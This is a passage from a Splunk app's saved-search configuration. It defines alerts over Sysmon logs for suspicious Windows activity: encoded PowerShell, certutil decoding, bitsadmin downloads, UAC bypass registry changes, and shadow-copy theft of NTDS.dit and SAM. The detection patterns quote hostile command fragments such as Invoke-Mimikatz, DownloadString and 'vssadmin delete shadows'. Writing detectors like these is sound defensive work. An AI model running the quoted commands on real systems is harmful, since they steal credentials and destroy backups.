display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# Either archive indicator AND an appdata path, both scoped to wscript.exe
search = `sysmon` process="wscript.exe" (\\Rar$ OR ".zip") \\appdata\\ | stats count by Computer,CommandLine

[netsh - all]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="netsh.exe" | stats values(CommandLine) by Computer

[bitsadmin - all]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="bitsadmin.exe" | stats values(CommandLine) by Computer

[Net - IPC$ access]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="net.exe" *ipc$* | stats values(CommandLine) by Computer

[installutil - all]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="installutil.exe" | stats values(CommandLine) by Computer

[Powershell - EncodedCommand]
action.email.useNSSubject = 1
alert.track = 0
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="powershell.exe" (CommandLine="*-encodedcommand*" OR CommandLine="*-enc*" OR CommandLine="-e" OR CommandLine="-ec" OR CommandLine="-encodedcomman" OR CommandLine="-encodedcomma" OR CommandLine="-encodedcomm" OR CommandLine="-encodedcom" OR CommandLine="-encodedco" OR CommandLine="-encodedc" OR CommandLine="-encoded" OR CommandLine="-encode" OR CommandLine="-encod" OR CommandLine="-enco" OR CommandLine="-en")| stats count by CommandLine | top CommandLine

[Critical Process]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
display.visualizations.type = singlevalue
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="powershell.exe" OR process="msbuild.exe" OR process="psexec.exe" OR process="at.exe" OR process="schtasks.exe" OR process="net.exe" OR process="vssadmin.exe" OR process="utilman.exe" OR process="wmic.exe" OR process="mshta.exe" OR process="wscript.exe" OR process="cscript.exe" OR process="cmd.exe" OR process="whoami.exe" OR process="mmc.exe" OR process="systeminfo.exe" OR process="csvde.exe" OR process="certutil.exe" | stats count by process


[IOC - svchost.exe not run by services.exe]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */15 * * * *
dispatch.earliest_time = -15m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# Image and ParentImage hold full paths in Sysmon events, so match on the trailing file name
search = `sysmon` EventCode="1" svchost.exe\
| search (Image="*\\svchost.exe") (ParentImage!="*\\services.exe")

[IOC - >5 Critical Process in 10m]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */10 * * * *
dispatch.earliest_time = -10m
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# Both Visual Studio parents are benign-launcher exclusions
search = `sysmon` EventCode="1" (process="powershell.exe" OR process="msbuild.exe" OR process="psexec.exe" OR process="at.exe" OR process="schtasks.exe" OR process="net.exe" OR process="vssadmin.exe" OR process="utilman.exe" OR process="wmic.exe" OR process="mshta.exe" OR process="whoami.exe" OR process="mmc.exe" OR process="systeminfo.exe" OR process="csvde.exe" OR process="nbtstat.exe") ParentImage!="C:\\Program Files (x86)\\Microsoft Visual Studio Common7\\IDE\\devenv.exe" ParentImage!="C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Professional\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Node.x86\\ServiceHub.Host.Node.x86.exe" | bin span=10m _time | stats values(CommandLine), count by host _time

[IOC - Suspicious Driver Loaded from Temp]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Driver loaded from /temp/ directory
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=6 ImageLoaded="*\\Temp\\*"

[IOC - Suspicious Exe Path]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# Image is the full path of the new process; the process field carries only the file name, so path patterns go against Image
search = `sysmon` EventCode="1" (Image="*\\$Recycle.bin\\*" OR Image="*\\Users\\All Users\\*" OR Image="*\\Users\\Default\\*" OR Image="C:\\Perflogs\\*" OR Image="*\\config\\systemprofile\\*" OR Image="*\\Windows\\Fonts\\*" OR Image="*\\Windows\\IME\\*" OR Image="*\\Windows\\addins\\*")

[IOC - Eventviewer UAC Bypass]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Detects UAC bypass method using Windows event viewer
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# The per-user hive path contains the user SID, hence the leading wildcard
search = `sysmon` EventCode=13 TargetObject="*\\mscfile\\*"

[IOC - UAC Bypass sdclt]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=13 TargetObject="*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand*"

[IOC - Powershell Suspicious Strings]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# The parentheses keep the EventCode and powershell.exe terms applied to every keyword
search = `sysmon` EventCode=1 powershell.exe (Invoke* OR IEX OR Download*) \
| table _time, host, ProcessID, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine

[IOC - Abnormally long Powershell Command]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 process=powershell.exe | eval c_length=len(CommandLine) | where c_length>500

[IOC - Commands run from Office Doc/Browser]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */15 * * * *
dispatch.earliest_time = -15m
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# Parent list is grouped so that the child-image condition applies to every Office/browser parent, not only to chrome.exe
search = `sysmon` EventCode=1 (ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE" OR ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OUTLOOK.EXE" OR ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE" OR ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office14\\POWERPNT.EXE" OR ParentImage="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" OR ParentImage="C:\\Program Files\\Internet Explorer\\iexplore.exe" OR ParentImage="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" OR ParentImage="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") AND (Image="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" OR Image="C:\\Windows\\System32\\cmd.exe" OR Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" OR Image="C:\\Windows\\System32\\rundll32.exe" OR Image="C:\\Windows\\System32\\wscript.exe" OR Image="C:\\Windows\\System32\\cscript.exe") CurrentDirectory!="C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\Browser\\WCChromeExtn\\" CurrentDirectory!="C:\\Users\\AppData\\Local\\Blue Jeans\\App\\" CommandLine!="*ScreenConnect*" CommandLine!="C:\\windows\\system32\\rundll32.exe C:\\windows\\system32\\inetcpl.cpl,ClearMyTracksByProcess*"| table _time host ParentImage CommandLine

[IOC - Suspicious binary launch location]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */15 * * * *
dispatch.earliest_time = -15m
display.page.search.mode = fast
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode="1" (Image="C:\\windows\\fonts\\*" OR Image="C:\\windows\\help\\*" OR Image="C:\\windows\\wbem\\*" OR Image="C:\\windows\\addins\\*" OR Image="C:\\windows\\debug\\*" OR Image="C:\\windows\\system32\\tasks*" OR Image="C:\\windows\\tasks\\*" OR Image="C:\\debug\\*")

[IOC - Suspicious execution of rundll - User Profile/Browser]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# The parent command line normally carries quoting and arguments around the path, hence wildcards on both sides
search = `sysmon` EventCode=1 Image="C:\\Windows\\system32\\rundll32.exe" CommandLine=*C:\\Users\\* ParentCommandLine="*Internet Explorer\\Iexplore.exe*"

[IOC - Certutil Decode in Appdata]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Detects a Microsoft certutil execution with the 'decode' sub command on files in the AppData folder, which is sometimes used to decode malicious code with the built-in certutil utility
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 process="certutil.exe" CommandLine="* -decode *AppData\\*"

[IOC - Download from bitsadmin]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Detects usage of bitsadmin downloading a file
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 process="bitsadmin.exe" CommandLine="*/transfer*"

[IOC - MSHTA Spawning Windows Shell]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Detects a Windows command line executable started from MSHTA
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 ParentImage=*\\mshta.exe (process="cmd.exe" OR process="powershell.exe" OR process="wscript.exe" OR process="cscript.exe" OR process="sh.exe" OR process="bash.exe")

[IOC - Process Created by MMC]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Processes started by MMC could be a sign of lateral movement using MMC application COM object
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 ParentImage=*\\mmc.exe process="cmd.exe" CommandLine!="runcmd.cmd"

[IOC - Shellcode Injected from Office]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=10 TargetImage="*\\verclsid.exe" GrantedAccess="0x1FFFFF" (CallTrace="*|UNKNOWN(*VBE7.DLL*" OR (SourceImage="*\\Microsoft Office\\*" AND CallTrace="*|UNKNOWN*"))

[IOC - Suspicious Powershell Exe from Scripting]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 (ParentImage="*\\wscript.exe" OR ParentImage="*\\cscript.exe") process="powershell.exe"

[IOC - Suspicious Script Execution]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Detects suspicious file execution by wscript and cscript
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 (process="wscript.exe" OR process="cscript.exe") (CommandLine="*.jse" OR CommandLine="*.vbe" OR CommandLine="*.js" OR CommandLine="*.vba")

[IOC - Vssadmin Activity]
action.email.useNSSubject = 1
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
description = Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
dispatch.earliest_time = -20m
display.page.search.mode = verbose
display.visualizations.charting.chart = pie
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 (CommandLine="vssadmin.exe Delete Shadows" OR CommandLine="vssadmin create shadow /for=C:" OR CommandLine="copy \\\\?\\GLOBALROOT\\Device\\windows\\ntds\\ntds.dit" OR CommandLine="copy \\?\GLOBALROOT\Device\*\config\SAM" OR CommandLine="vssadmin delete shadows /for=C:" OR CommandLine="reg SAVE HKLM\SYSTEM ")

[IOC - MSHTA JavaScript Invoke]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.general.type = statistics
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 process=mshta.exe CommandLine=*javascript:* | table Computer ParentImage ParentCommandLine process CommandLine user LogonGuid

[IOC - Powershell Suspicious Strings 01]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = pie
display.visualizations.type = mapping
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 process=powershell.exe (*-W*Hidden* OR *-nologo* OR *-nop* OR *IEX* OR *Out-MiniDump* OR *-enc* OR *-EncodedCommand* OR *DownloadString* OR *DownloadFile* OR *DownloadData* OR *ShellExecute* OR *Invoke-Mimikatz* OR *schtasks*create* OR *Webclient* OR *FromBase64String* OR *IO.StreamReader* OR *IO.MemoryStream* OR *IO.Compression.DeflateStream* ) NOT ( C:\\windows\\ccm\\)\
| table _time, host, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine, User

[T1086 - Powershell Suspicious Strings]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.suppress = 0
alert.track = 0
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = pie
display.visualizations.show = 0
display.visualizations.type = mapping
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 process=powershell.exe (*-W*Hidden* OR *-nologo* OR *-nop* OR *IEX* OR *Out-MiniDump* OR *-enc* OR *-EncodedCommand* OR *DownloadString* OR *DownloadFile* OR *DownloadData* OR *ShellExecute* OR *Invoke-Mimikatz* OR *schtasks*create* OR *Webclient* OR *FromBase64String* OR *IO.StreamReader* OR *IO.MemoryStream* OR *IO.Compression.DeflateStream* ) NOT ( C:\\windows\\ccm\\)\
| table _time, host, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine, User

[T1015_Accessibility_Backdoor]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.track = 0
description = T1015_Accessibility_Backdoor
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.general.type = statistics
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 (\
(ParentImage=*\\winlogon.exe \
((process=Utilman.exe CommandLine=*/debug*) OR (process=sethc.exe (CommandLine=*sethc.exe 211* OR CommandLine=*sethc.exe 101*)))) \
OR\
(ParentImage=*\\utilman.exe (CommandLine=*osk.exe* OR CommandLine=*magnify.exe* OR CommandLine=*narrator.exe* OR CommandLine=*DisplaySwitch.exe* OR CommandLine=*AtBroker.exe*))\
)\
| table _time, host, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine, User

[IOC - Disable Startup Repair]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.visualizations.charting.chart = bubble
display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz
display.visualizations.type = custom
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process=BCDEDIT.EXE (CommandLine=*/set*recoveryenable*no* OR CommandLine=*/set*bootstatuspolicy*ignoreallfailures*)

[Runs From RECYCLEBIN]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.track = 0
dispatch.earliest_time = -7d@h
dispatch.latest_time = now
dispatchAs = user
display.general.type = statistics
display.page.search.tab = statistics
display.visualizations.charting.chart = bubble
display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz
display.visualizations.show = 0
display.visualizations.type = custom
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 ($RECYCLE.BIN OR \\RECYCLER\\) | stats values(host) as host values(CommandLine) values(user) count by ParentImage process

[Runs from SYSVOL]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
display.general.type = statistics
display.page.search.tab = statistics
display.visualizations.charting.chart = bubble
display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz
display.visualizations.show = 0
display.visualizations.type = custom
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 :\\System Volume Information\\ | stats values(host) as host values(CommandLine) values(user) count by ParentImage Image

[T1117 - REGSVR Proxy Execution]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.severity = 4
alert.suppress = 0
alert.track = 1
counttype = number of events
cron_schedule = */20 * * * *
dispatch.earliest_time = -20m
display.general.type = statistics
display.page.search.tab = statistics
display.visualizations.charting.chart = bubble
display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz
display.visualizations.type = custom
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` EventCode=1 process=REGSVR32.EXE CommandLine=*/i:*http://* | table _time host Image CommandLine ParentImage ParentCommandLine user

[rundll32.exe - All Executions]
action.email.useNSSubject = 1
action.securityanalytics_ar.param.verbose = 0
alert.track = 0
description = T1085
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
1194 | display.general.type = statistics 1195 | display.page.search.tab = statistics 1196 | display.visualizations.charting.chart = bubble 1197 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1198 | display.visualizations.show = 0 1199 | display.visualizations.type = custom 1200 | request.ui_dispatch_app = sysmon-splunk-app 1201 | request.ui_dispatch_view = search 1202 | search = `sysmon` process=rundll32.exe | stats values(ParentImage) values(process) count by CommandLine 1203 | 1204 | [T1085 - rundll32 with javascript arg] 1205 | action.email.useNSSubject = 1 1206 | action.securityanalytics_ar.param.verbose = 0 1207 | alert.suppress = 0 1208 | alert.track = 1 1209 | counttype = number of events 1210 | cron_schedule = */20 * * * * 1211 | dispatch.earliest_time = -20m 1212 | display.general.type = statistics 1213 | display.page.search.tab = statistics 1214 | display.visualizations.charting.chart = bubble 1215 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1216 | display.visualizations.type = custom 1217 | enableSched = 1 1218 | quantity = 0 1219 | relation = greater than 1220 | request.ui_dispatch_app = sysmon-splunk-app 1221 | request.ui_dispatch_view = search 1222 | search = `sysmon` EventCode=1 process=rundll32.exe CommandLine=*javascript:* | table _time host process ParentImage CommandLine ParentCommandLine 1223 | 1224 | [IOC - Suspicious msiexec execution] 1225 | action.email.useNSSubject = 1 1226 | action.securityanalytics_ar.param.verbose = 0 1227 | alert.suppress = 0 1228 | alert.track = 1 1229 | counttype = number of events 1230 | cron_schedule = */20 * * * * 1231 | dispatch.earliest_time = -20m 1232 | display.page.search.mode = verbose 1233 | display.visualizations.charting.chart = bar 1234 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1235 | display.visualizations.type = singlevalue 1236 | enableSched = 1 1237 | quantity = 0 1238 | relation = greater than 1239 | 
request.ui_dispatch_app = sysmon-splunk-app 1240 | request.ui_dispatch_view = search 1241 | search = `sysmon` process=msiexec.exe CommandLine=*/i*http* 1242 | -------------------------------------------------------------------------------- /metadata/default.meta: -------------------------------------------------------------------------------- 1 | 2 | # Application-level permissions 3 | 4 | [] 5 | access = read : [ * ], write : [ admin, power ] 6 | 7 | ### EVENT TYPES 8 | 9 | [eventtypes] 10 | export = system 11 | 12 | 13 | ### PROPS 14 | 15 | [props] 16 | export = system 17 | 18 | 19 | ### TRANSFORMS 20 | 21 | [transforms] 22 | export = system 23 | 24 | 25 | ### LOOKUPS 26 | 27 | [lookups] 28 | export = system 29 | 30 | 31 | ### VIEWSTATES: even normal users should be able to create shared viewstates 32 | 33 | [viewstates] 34 | access = read : [ * ], write : [ * ] 35 | export = system 36 | -------------------------------------------------------------------------------- /static/appIcon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIcon.png -------------------------------------------------------------------------------- /static/appIconAlt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIconAlt.png -------------------------------------------------------------------------------- /static/appIconAlt_2x.png: -------------------------------------------------------------------------------- 